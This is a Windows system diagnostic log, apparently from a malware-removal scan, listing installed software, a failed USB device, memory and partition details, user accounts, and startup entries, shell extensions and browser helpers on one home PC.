Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 10.0.2.1000 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 13.1.0.1058 - Intel Corporation)
IObit Malware Fighter 4 (HKLM-x32\...\IObit Malware Fighter_is1) (Version: 4.2 - IObit)
IObit Uninstaller (HKLM-x32\...\IObitUninstall) (Version: 5.4.0.125 - IObit)
Java 8 Update 60 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218060F0}) (Version: 8.0.600.27 - Oracle Corporation)
Junk Mail filter update (HKLM-x32\...\{0BE9E708-5DC0-4963-9CFD-0AA519090E79}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
LMMS 1.1.3 (HKLM-x32\...\LMMS) (Version: 1.1.3 - LMMS Developers)
LogMeIn Hamachi (HKLM-x32\...\{91B5DF26-717A-4A5F-AB10-CD450FAD428C}) (Version: 2.2.0.541 - LogMeIn, Inc.) Hidden
LogMeIn Hamachi (HKLM-x32\...\LogMeIn Hamachi) (Version: 2.2.0.541 - LogMeIn, Inc.)
Lords of Football (HKLM\...\Steam App 230650) (Version: - Geniaware Srl)
LSPD First Response (HKLM-x32\...\LSPD First Response) (Version: 0.3.1 - G17 Media)
Mad Max (HKLM-x32\...\Steam App 234140) (Version: - Avalanche Studios)
MEGAsync (HKLM-x32\...\MEGAsync) (Version: - Mega Limited)
Men of War: Assault Squad 2 (HKLM-x32\...\Steam App 244450) (Version: - Digitalmindsoft)
METAL GEAR SOLID V: THE PHANTOM PAIN (HKLM-x32\...\Steam App 287700) (Version: - Konami Digital Entertainment)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{59E4543A-D49D-4489-B445-473D763C79AF}) (Version: 2.0.672.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24210 (HKLM-x32\...\{f144e08f-9cbe-4f09-9a8c-f2b858b7ee7f}) (Version: 14.0.24210.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24210 (HKLM-x32\...\{23658c02-145e-483d-ba6b-1eb82c580529}) (Version: 14.0.24210.0 - Microsoft Corporation)
Minecraft (HKLM-x32\...\{1C16BCA3-EBC1-49F6-8623-8FBFB9CCC872}) (Version: 1.0.3.0 - Mojang)
Mount & Blade (HKLM\...\Steam App 22100) (Version: - TaleWorlds Entertainment)
Mount & Blade: Warband (HKLM\...\Steam App 48700) (Version: - TaleWorlds Entertainment)
Movie Maker (HKLM-x32\...\{DD67BE4B-7E62-4215-AFA3-F123A800A389}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Movie Maker (HKLM-x32\...\{EB3DF0F0-0525-4C5A-A2F8-DEC868A3075D}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Movie Studio Platinum 12.0 (64-bit) (HKLM\...\{A743F12E-0A86-11E3-8F1A-F04DA23A5C58}) (Version: 12.0.1184 - Sony)
Mozilla Firefox 41.0.2 (x86 en-GB) (HKLM-x32\...\Mozilla Firefox 41.0.2 (x86 en-GB)) (Version: 41.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 41.0.2 - Mozilla)
Music Wars Empire (HKLM\...\Steam App 479100) (Version: - Antuan Johnson)
Norton 360 (HKLM-x32\...\N360) (Version: 22.8.1.14 - Symantec Corporation)
NVIDIA 3D Vision Controller Driver 369.04 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 369.04 - NVIDIA Corporation)
NVIDIA 3D Vision Driver 375.95 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 375.95 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.1.2.31 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.1.2.31 - NVIDIA Corporation)
NVIDIA Graphics Driver 375.95 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 375.95 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.34.17 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.17 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.16.0318 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.16.0318 - NVIDIA Corporation)
NvNodejs (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvNodejs) (Version: 3.1.2.31 - NVIDIA Corporation) Hidden
NvTelemetry (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvTelemetry) (Version: 1.2.0.0 - NVIDIA Corporation) Hidden
Origin (HKLM-x32\...\Origin) (Version: 10.3.3.1921 - Electronic Arts, Inc.)
Out of the Park Baseball 15 (HKLM\...\Steam App 272670) (Version: - Out of the Park Developments)
Overwatch (HKLM-x32\...\Overwatch) (Version: - Blizzard Entertainment)
Overwolf (HKLM-x32\...\Overwolf) (Version: 0.100.9.0 - Overwolf Ltd.)
Planet Coaster (HKLM\...\Steam App 493340) (Version: - Frontier Developments)
POSTAL 2 (HKLM\...\Steam App 223470) (Version: - Running With Scissors)
Rainbow Six Siege - Closed Beta (HKLM-x32\...\Uplay Install 1001) (Version: - Ubisoft)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7354 - Realtek Semiconductor Corp.)
REAPER (x64) (HKLM\...\REAPER) (Version: - )
Rocket League (HKLM\...\Steam App 252950) (Version: - Psyonix, Inc.)
Rockstar Games Social Club (HKLM-x32\...\Rockstar Games Social Club) (Version: 1.2.0.8 - Rockstar Games)
Selection Tools (HKCU\...\Selection Tools) (Version: - WTools)
SHIELD Streaming (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_GFExperience.NvStreamSrv) (Version: 7.1.0340 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_ShieldWirelessController) (Version: 3.1.2.31 - NVIDIA Corporation) Hidden
Skype Click to Call (HKLM-x32\...\{873F8E7C-10E6-449F-BD7E-5FBA7C8E1C9B}) (Version: 8.5.0.9167 - Microsoft Corporation)
Skype™ 7.30 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.30.105 - Skype Technologies S.A.)
SlimCleaner Plus (HKLM\...\{70AA5E57-6A21-42B8-9B5F-8F071CC265AD}) (Version: 2.5.8 - Slimware Utilities Holdings, Inc.) Hidden
SlimCleaner Plus (HKLM\...\SlimCleaner Plus) (Version: 2.5.8 - Slimware Utilities Holdings, Inc.)
Smart Defrag 5 (HKLM-x32\...\Smart Defrag_is1) (Version: 5.2.0 - IObit)
Source SDK Base 2006 (HKLM\...\Steam App 215) (Version: - Valve)
Speccy (HKLM\...\Speccy) (Version: 1.30 - Piriform)
Spotify (HKCU\...\Spotify) (Version: 1.0.44.100.ga60c0ce1 - Spotify AB)
Star Wars - Battlefront II (HKLM-x32\...\Steam App 6060) (Version: - Pandemic Studios)
Star Wars Battlefront (HKLM-x32\...\{C79CB9C7-10A4-4814-8402-F574672C2192}) (Version: 1.0 - LucasArts)
Star Wars Empire at War (HKLM-x32\...\{99AE7207-8612-4DBA-A8F8-BAE5C633390D}) (Version: 1.0 - LucasArts)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Superb Game Boost 3.0 (HKLM-x32\...\SuperbGameBoost_is1) (Version: 3.0 - )
TAP-Windows 9.9.2 (HKLM\...\TAP-Windows) (Version: 9.9.2 - )
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.18 - TeamSpeak Systems GmbH)
TEW2013 (HKLM-x32\...\TEW2013) (Version: - )
TEW2016 (HKLM-x32\...\TEW2016) (Version: - )
The Sims™ 4 (HKLM-x32\...\{48EBEBBF-B9F8-4520-A3CF-89A730721917}) (Version: 1.22.22.1020 - Electronic Arts Inc.)
The Witcher 3 - Wild Hunt (HKLM-x32\...\1207664643_is1) (Version: 1.12.1.0 - GOG.com)
Tom Clancy's Rainbow Six Siege (HKLM-x32\...\Uplay Install 635) (Version: - Ubisoft Montreal)
Total Extreme Wrestling Components (HKLM-x32\...\{97CF5825-218E-4AF8-9A3E-73F031C9DF0E}) (Version: 1.00.0000 - Encore)
Total War: SHOGUN 2 (HKLM\...\Steam App 34330) (Version: - The Creative Assembly)
Total War™: WARHAMMER® (HKLM\...\Steam App 364360) (Version: - Creative Assembly)
TOXIKK (HKLM\...\Steam App 324810) (Version: - Reakktor Studios)
TunnelBear (HKLM-x32\...\{7094abcc-0311-45f4-aaac-638bf633a58a}) (Version: 2.3.22.0 - TunnelBear)
TunnelBear (HKLM-x32\...\{EFF0A0F1-E557-4228-8F55-E6DD94516FDC}) (Version: 2.3.22.0 - TunnelBear) Hidden
Uplay (HKLM-x32\...\Uplay) (Version: 10.0 - Ubisoft)
UserTesting (HKCU\...\UserTestingPlugin) (Version: - UserTesting.com)
Virtual DJ Toolbar (HKLM-x32\...\{56444A00-6A76-A76A-76A7-A758B70C2300}) (Version: 12.35.0.2436 - APN, LLC)
VirtualDJ Home FREE (HKLM-x32\...\{5E1375CB-6792-4464-8715-CC3EC83D48FA}) (Version: 7.0.5 - Atomix Productions)
Vulkan Run Time Libraries 1.0.26.0 (HKLM\...\VulkanRT1.0.26.0) (Version: 1.0.26.0 - LunarG, Inc.)
Webcam Screen Recorder 7.0 (HKLM-x32\...\WCSRSetup7.0.0_is1) (Version: 7.0.0 - Web Solution Mart)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
Windows Movie Maker 2.6 (HKLM-x32\...\{B3DAF54F-DB25-4586-9EF1-96D24BB14088}) (Version: 2.6.4037.0 - Microsoft Corporation)
WinRAR 5.30 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.30.0 - win.rar GmbH)
XCOM 2 (HKLM-x32\...\Steam App 268500) (Version: - Firaxis)
Xfire (remove only) (HKLM-x32\...\Xfire) (Version: - )
XSplit Broadcaster (HKLM-x32\...\{4366B373-1578-43E9-8FC9-3C5D6D529314}) (Version: 2.8.1607.1936 - SplitmediaLabs)
Yahoo Search Set (HKLM-x32\...\Yahoo! SearchSet) (Version: - Yahoo Inc.)

========================= Devices: ================================

Name: Unknown USB Device (Device Descriptor Request Failed)
Description: Unknown USB Device (Device Descriptor Request Failed)
Class Guid: {36fc9e60-c465-11cf-8056-444553540000}
Manufacturer: (Standard USB Host Controller)
Service:
Device ID: USB\VID_0000&PID_0002\5&2D77C530&0&11
Problem: : Windows has stopped this device because it has reported problems. (Code 43)
Resolution: One of the drivers controlling the device notified the operating system that the device failed in some manner. For more information about how to diagnose the problem, see the hardware documentation.


========================= Memory info: ===================================

Percentage of memory in use: 35%
Total physical RAM: 16325.85 MB
Available physical RAM: 10476.1 MB
Total Virtual: 18757.85 MB
Available Virtual: 10954.71 MB

========================= Partitions: =====================================

1 Drive c: () (Fixed) (Total:930.96 GB) (Free:143.16 GB) NTFS
2 Drive e: (Rainbow Six Siege Disc 3) (CDROM) (Total:3.13 GB) (Free:0 GB) UDF

========================= Users: ========================================

User accounts for \\DESKTOP-5GKAVDH

Administrator DefaultAccount Guest
Nathan


**** End of log ****

"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" "" "" "" "" ""
+ "AdobeAAMUpdater-1.0" "Adobe Updater Startup Utility" "Adobe Systems Incorporated" "c:\program files (x86)\common files\adobe\oobe\pdapp\uwa\updaterstartuputility.exe" "29/06/2016 07:29" ""
+ "Elgato Sound Capture" "Elgato Sound Capture Tray" "" "c:\program files\elgato\soundcapture\soundcapture.exe" "15/09/2016 20:12" ""
+ "IAStorIcon" "Delayed launcher" "Intel Corporation" "c:\program files\intel\intel(r) rapid storage technology\iastoriconlaunch.exe" "28/05/2014 17:11" ""
+ "MouseDriver" "" "" "File not found: TiltWheelMouse.exe" "" ""
+ "RTHDVCPL" "Realtek HD Audio Manager" "Realtek Semiconductor" "c:\program files\realtek\audio\hda\rtkngui64.exe" "29/09/2014 08:16" ""
+ "ShadowPlay" "NVIDIA Capture Server Proxy" "NVIDIA Corporation" "c:\windows\system32\nvspcap64.dll" "16/11/2016 16:36" ""
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run" "" "" "" "" ""
+ "Adobe Creative Cloud" "Adobe Creative Cloud" "Adobe Systems Incorporated" "c:\program files (x86)\adobe\adobe creative cloud\acc\creative cloud.exe" "25/10/2016 17:24" ""
+ "ApnTBMon" "Ask Toolbar Notifier" "APN" "c:\program files (x86)\askpartnernetwork\toolbar\updater\tbnotifier.exe" "09/09/2015 22:27" ""
+ "AvgUi" "AVG User Interface" "AVG Technologies CZ, s.r.o." "c:\program files (x86)\avg\framework\common\avguix.exe" "12/11/2015 15:57" ""
+ "BMISR" "Genius Button Manager" "" "c:\program files (x86)\kye\facecam 311\bm.exe" "30/03/2010 03:39" ""
+ "Corsair Utility Engine" "Corsair Utility Engine" "Corsair Components, Inc." "c:\program files (x86)\corsair\corsair utility engine\corsairhid.exe" "23/03/2016 09:11" ""
+ "IObit Malware Fighter" "IObit Malware Fighter" "IObit" "c:\program files (x86)\iobit\iobit malware fighter\imf.exe" "28/06/2016 07:50" ""
+ "LogMeIn Hamachi Ui" "Hamachi Client Application" "LogMeIn Inc." "c:\program files (x86)\logmein hamachi\hamachi-2-ui.exe" "11/11/2016 12:45" ""
+ "PowerDVD15Agent" "PowerDVD 15" "CyberLink Corp." "c:\program files (x86)\cyberlink\powerdvd15\powerdvd15agent.exe" "10/03/2015 13:05" ""
+ "SunJavaUpdateSched" "Java Update Scheduler" "Oracle Corporation" "c:\program files (x86)\common files\java\java update\jusched.exe" "04/08/2015 19:47" ""
"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" "" "" "" "" ""
+ "Advanced SystemCare 9" "Advanced SystemCare 9" "IObit" "c:\program files (x86)\iobit\advanced systemcare\asctray.exe" "25/07/2016 07:15" ""
+ "CyberGhost" "CyberGhost" "CyberGhost S.R.L." "c:\program files\cyberghost 5\cyberghost.exe" "11/01/2016 11:55" ""
+ "Discord" "Discord" "Hammer & Chisel, Inc." "c:\users\nathan\appdata\local\discord\app-0.0.296\discord.exe" "23/08/2016 21:35" ""
+ "EADM" "Origin" "Electronic Arts" "c:\program files (x86)\origin\origin.exe" "24/11/2016 19:48" ""
+ "GalaxyClient" "GOG Galaxy" "GOG.com" "c:\program files (x86)\galaxyclient\galaxyclient.exe" "06/12/2016 13:11" ""
+ "GoogleChromeAutoLaunch_02408A78B8D1B61DE75168766306C75C" "Chromium" "The Chromium Authors" "c:\users\nathan\appdata\local\chromium\application\chrome.exe" "04/08/2015 02:22" ""
+ "GoogleChromeAutoLaunch_03D75E4CDB7EC9B07D7B1096AAC5AF87" "Google Chrome" "Google Inc." "c:\program files (x86)\google\chrome\application\chrome.exe" "08/11/2016 17:20" ""
+ "GoogleChromeAutoLaunch_14B61C6A02163755AC6E1628BB204E5E" "BrowserAir" "Goobzo" "c:\users\nathan\appdata\local\browserair\application\browserair.exe" "23/12/2015 11:53" ""
+ "OneDrive" "Microsoft OneDrive" "Microsoft Corporation" "c:\users\nathan\appdata\local\microsoft\onedrive\onedrive.exe" "09/08/2016 18:30" ""
+ "Selection Tools" "Selection Tools" "Nosibay" "c:\users\nathan\appdata\roaming\wtools\selection tools\selection tools.exe" "17/11/2015 14:25" ""
+ "Skype" "Skype " "Skype Technologies S.A." "c:\program files (x86)\skype\phone\skype.exe" "15/11/2016 16:28" ""
+ "SlimCleaner Plus" "SlimCleaner Plus" "Slimware Utilities Holdings, Inc." "c:\program files\slimcleaner plus\slimcleanerplus.exe" "25/07/2016 21:32" ""
+ "Spotify" "Spotify" "Spotify Ltd" "c:\users\nathan\appdata\roaming\spotify\spotify.exe" "06/12/2016 12:58" ""
+ "Spotify Web Helper" "SpotifyWebHelper" "Spotify Ltd" "c:\users\nathan\appdata\roaming\spotify\spotifywebhelper.exe" "06/12/2016 12:57" ""
+ "Steam" "Steam Client Bootstrapper" "Valve Corporation" "c:\program files (x86)\steam\steam.exe" "13/10/2016 00:50" ""
"C:\Users\Nathan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" "" "" "" "" ""
+ "Adobe Gamma.lnk" "Adobe Gamma Loader" "Adobe Systems, Inc." "c:\program files (x86)\common files\adobe\calibration\adobe gamma loader.exe" "04/11/1999 22:06" ""
+ "Free2X Webcam Recorder.lnk" "" "" "c:\program files (x86)\free2x\webcam recorder\webcamrecorder.exe" "04/03/2014 15:08" ""
+ "MEGAsync.lnk" "MEGAsync" "Mega Limited" "c:\users\nathan\appdata\local\megasync\megasync.exe" "09/11/2016 18:11" ""
+ "Xfire.lnk" "Xfire" "Xfire Inc." "c:\program files (x86)\xfire\xfire.exe" "30/08/2006 00:18" ""
"HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components" "" "" "" "" ""
+ "Microsoft Windows" "Windows Mail" "Microsoft Corporation" "c:\program files\windows mail\winmail.exe" "16/07/2016 02:25" ""
+ "Microsoft Windows Media Player" "" "" "File not found: C:\WINDOWS\inf\unregmp2.exe /ShowWMP.exe" "" ""
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components" "" "" "" "" ""
+ "Google Chrome" "Google Chrome Installer" "Google Inc." "c:\program files (x86)\google\chrome\application\54.0.2840.99\installer\chrmstp.exe" "08/11/2016 19:25" ""
+ "Microsoft Windows" "Windows Mail" "Microsoft Corporation" "c:\program files (x86)\windows mail\winmail.exe" "16/07/2016 01:41" ""
"HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers" "" "" "" "" ""
+ "###MegaContextMenuExt" "" "" "c:\users\nathan\appdata\local\megasync\shellextx64.dll" "31/10/2016 19:45" ""
+ "AccExt" "Core Sync" "" "c:\program files (x86)\adobe\adobe creative cloud\coresyncextension\coresync_x64.dll" "25/10/2016 16:35" ""
+ "Advanced SystemCare" "ASCExtMenu Module" "IObit" "c:\program files (x86)\iobit\advanced systemcare\ascextmenu_64.dll" "15/10/2015 11:03" ""
+ "BUContextMenu" "Backup Shell" "Symantec Corporation" "c:\program files (x86)\norton 360\engine64\22.8.1.14\bushell.dll" "17/10/2016 10:14" ""
+ "IObit Malware Fighter" "IMFShellExt Module" "IObit" "c:\program files (x86)\iobit\iobit malware fighter\imfshellext.dll" "30/03/2016 10:07" ""
+ "IObitUnstaler" "IObitUnlockerExtension" "IObit" "c:\program files (x86)\iobit\iobit uninstaller\uninstallmenuright.dll" "01/08/2014 09:40" ""
+ "SmartDefragExtension" "IObit Smart Defrag Extension" "IObit" "c:\windows\system32\iobitsmartdefragextension.dll" "24/03/2016 05:02" ""
+ "Symantec.Norton.Antivirus.IEContextMenu" "Norton Security Shell Extension Module" "Symantec Corporation" "c:\program files (x86)\norton 360\engine64\22.8.1.14\navshext.dll" "12/11/2016 03:46" ""
+ "WinRAR" "WinRAR shell extension" "Alexander Roshal" "c:\program files\winrar\rarext.dll" "18/11/2015 09:15" ""
"HKLM\Software\Classes\Drive\ShellEx\ContextMenuHandlers" "" "" "" "" ""
+ "Advanced SystemCare" "ASCExtMenu Module" "IObit" "c:\program files (x86)\iobit\advanced systemcare\ascextmenu_64.dll" "15/10/2015 11:03" ""
+ "Symantec.Norton.Antivirus.IEContextMenu" "Norton Security Shell Extension Module" "Symantec Corporation" "c:\program files (x86)\norton 360\engine64\22.8.1.14\navshext.dll" "12/11/2016 03:46" ""
"HKLM\Software\Classes\*\ShellEx\PropertySheetHandlers" "" "" "" "" ""
+ "BuPropertySheet" "Backup Shell" "Symantec Corporation" "c:\program files (x86)\norton 360\engine64\22.8.1.14\bushell.dll" "17/10/2016 10:14" ""
"HKLM\Software\Classes\Directory\ShellEx\ContextMenuHandlers" "" "" "" "" ""
+ "###MegaContextMenuExt" "" "" "c:\users\nathan\appdata\local\megasync\shellextx64.dll" "31/10/2016 19:45" ""
+ "Advanced SystemCare" "ASCExtMenu Module" "IObit" "c:\program files (x86)\iobit\advanced systemcare\ascextmenu_64.dll" "15/10/2015 11:03" ""
+ "IObit Malware Fighter" "IMFShellExt Module" "IObit" "c:\program files (x86)\iobit\iobit malware fighter\imfshellext.dll" "30/03/2016 10:07" ""
+ "IObitUnstaler" "IObitUnlockerExtension" "IObit" "c:\program files (x86)\iobit\iobit uninstaller\uninstallmenuright.dll" "01/08/2014 09:40" ""
"HKLM\Software\Classes\Directory\Background\ShellEx\ContextMenuHandlers" "" "" "" "" ""
+ "NvCplDesktopContext" "NVIDIA Display Shell Extension" "NVIDIA Corporation" "c:\windows\system32\nvshext.dll" "17/11/2016 00:59" ""
"HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers" "" "" "" "" ""
+ "AccExt" "Core Sync" "" "c:\program files (x86)\adobe\adobe creative cloud\coresyncextension\coresync_x64.dll" "25/10/2016 16:35" ""
+ "BUContextMenu" "Backup Shell" "Symantec Corporation" "c:\program files (x86)\norton 360\engine64\22.8.1.14\bushell.dll" "17/10/2016 10:14" ""
+ "IObit Malware Fighter" "IMFShellExt Module" "IObit" "c:\program files (x86)\iobit\iobit malware fighter\imfshellext.dll" "30/03/2016 10:07" ""
+ "IObitUnstaler" "IObitUnlockerExtension" "IObit" "c:\program files (x86)\iobit\iobit uninstaller\uninstallmenuright.dll" "01/08/2014 09:40" ""
+ "SmartDefragExtension" "IObit Smart Defrag Extension" "IObit" "c:\windows\system32\iobitsmartdefragextension.dll" "24/03/2016 05:02" ""
+ "Symantec.Norton.Antivirus.IEContextMenu" "Norton Security Shell Extension Module" "Symantec Corporation" "c:\program files (x86)\norton 360\engine64\22.8.1.14\navshext.dll" "12/11/2016 03:46" ""
+ "WinRAR" "WinRAR shell extension" "Alexander Roshal" "c:\program files\winrar\rarext.dll" "18/11/2015 09:15" ""
"HKLM\Software\Classes\Folder\ShellEx\DragDropHandlers" "" "" "" "" ""
+ "WinRAR" "WinRAR shell extension" "Alexander Roshal" "c:\program files\winrar\rarext.dll" "18/11/2015 09:15" ""
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers" "" "" "" "" ""
+ " OverlayExcluded" "Backup Shell" "Symantec Corporation" "c:\program files (x86)\norton 360\engine64\22.8.1.14\bushell.dll" "17/10/2016 10:14" ""
+ " OverlayPending" "Backup Shell" "Symantec Corporation" "c:\program files (x86)\norton 360\engine64\22.8.1.14\bushell.dll" "17/10/2016 10:14" ""
+ " OverlayProtected" "Backup Shell" "Symantec Corporation" "c:\program files (x86)\norton 360\engine64\22.8.1.14\bushell.dll" "17/10/2016 10:14" ""
+ " AccExtIco1" "Core Sync" "" "c:\program files (x86)\adobe\adobe creative cloud\coresyncextension\coresync_x64.dll" "25/10/2016 16:35" ""
+ " AccExtIco2" "Core Sync" "" "c:\program files (x86)\adobe\adobe creative cloud\coresyncextension\coresync_x64.dll" "25/10/2016 16:35" ""
+ " AccExtIco3" "Core Sync" "" "c:\program files (x86)\adobe\adobe creative cloud\coresyncextension\coresync_x64.dll" "25/10/2016 16:35" ""
+ "###MegaShellExtPending" "" "" "c:\users\nathan\appdata\local\megasync\shellextx64.dll" "31/10/2016 19:45" ""
+ "###MegaShellExtSynced" "" "" "c:\users\nathan\appdata\local\megasync\shellextx64.dll" "31/10/2016 19:45" ""
+ "###MegaShellExtSyncing" "" "" "c:\users\nathan\appdata\local\megasync\shellextx64.dll" "31/10/2016 19:45" ""
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers" "" "" "" "" ""
+ "###MegaShellExtPending" "" "" "c:\users\nathan\appdata\local\megasync\shellextx32.dll" "31/10/2016 19:43" ""
+ "###MegaShellExtSynced" "" "" "c:\users\nathan\appdata\local\megasync\shellextx32.dll" "31/10/2016 19:43" ""
+ "###MegaShellExtSyncing" "" "" "c:\users\nathan\appdata\local\megasync\shellextx32.dll" "31/10/2016 19:43" ""
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects" "" "" "" "" ""
+ "ExplorerWnd Helper" "Uninstall for explorer" "IObit" "c:\program files (x86)\iobit\iobit uninstaller\uninstallexplorer.dll" "01/06/2015 10:41" ""
+ "Google Toolbar Helper" "Google Toolbar" "Google Inc." "c:\program files (x86)\google\google toolbar\googletoolbar_64.dll" "31/10/2016 22:58" ""
+ "Norton Identity Protection" "coIEPlugIn" "Symantec Corporation" "c:\program files (x86)\norton 360\engine64\22.8.1.14\coieplg.dll" "11/11/2016 21:09" ""
+ "Virtual DJ Toolbar" "Passport" "APN LLC." "c:\program files (x86)\askpartnernetwork\toolbar\vdj\passport_x64.dll" "09/09/2015 21:04" ""
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects" "" "" "" "" ""
+ "Google Toolbar Helper" "Google Toolbar" "Google Inc." "c:\program files (x86)\google\google toolbar\googletoolbar_32.dll" "31/10/2016 23:01" ""
+ "Java(tm) Plug-In 2 SSV Helper" "Java(TM) Platform SE binary" "Oracle Corporation" "c:\program files (x86)\java\jre1.8.0_60\bin\jp2ssv.dll" "04/08/2015 18:54" ""
+ "Java(tm) Plug-In SSV Helper" "Java(TM) Platform SE binary" "Oracle Corporation" "c:\program files (x86)\java\jre1.8.0_60\bin\ssv.dll" "04/08/2015 18:53" ""
+ "Norton Identity Protection" "coIEPlugIn" "Symantec Corporation" "c:\program files (x86)\norton 360\engine\22.8.1.14\coieplg.dll" "11/11/2016 21:09" ""
"HKLM\Software\Microsoft\Internet Explorer\Toolbar" "" "" "" "" ""
+ "Google Toolbar" "Google Toolbar" "Google Inc." "c:\program files (x86)\google\google toolbar\googletoolbar_64.dll" "31/10/2016 22:58" ""
